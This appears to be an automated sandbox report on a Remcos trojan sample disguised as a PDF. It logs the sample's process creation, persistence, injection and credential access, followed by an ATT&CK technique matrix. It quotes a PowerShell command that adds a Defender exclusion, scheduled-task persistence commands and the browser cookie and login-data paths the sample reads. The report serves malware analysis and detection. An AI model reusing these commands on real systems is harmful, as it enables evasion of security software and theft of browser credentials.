            Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe protection: read write
            Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\PresentationHost.exe | Thread register set: target process: 5752
            Source: C:\Users\user\Desktop\Re property pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Users\user\Desktop\Re property pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"
            Source: C:\Users\user\Desktop\Re property pdf.exe | Process created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe | Process created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe | Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
            Source: C:\Windows\SysWOW64\PresentationHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Re property pdf.exe | Queries volume information: C:\Users\user\Desktop\Re property pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\Re property pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Re property pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Re property pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, Queries volume information: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Re property pdf.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\PresentationHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\PresentationHost.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 6.2.Re property pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 6.2.Re property pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000006.00000002.2172213068.0000000000A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.2173602365.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            [Figure: Behavior Graph. ID: 1537675, Sample: Re property pdf.exe, Startdate: 19/10/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            Re property pdf.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
            Re property pdf.exe | 100% | Joe Sandbox ML | |
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1537675
Start date and time: 2024-10-19 12:55:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Re property pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@22/12@15/9
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 74
• Number of non-executed functions: 264
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
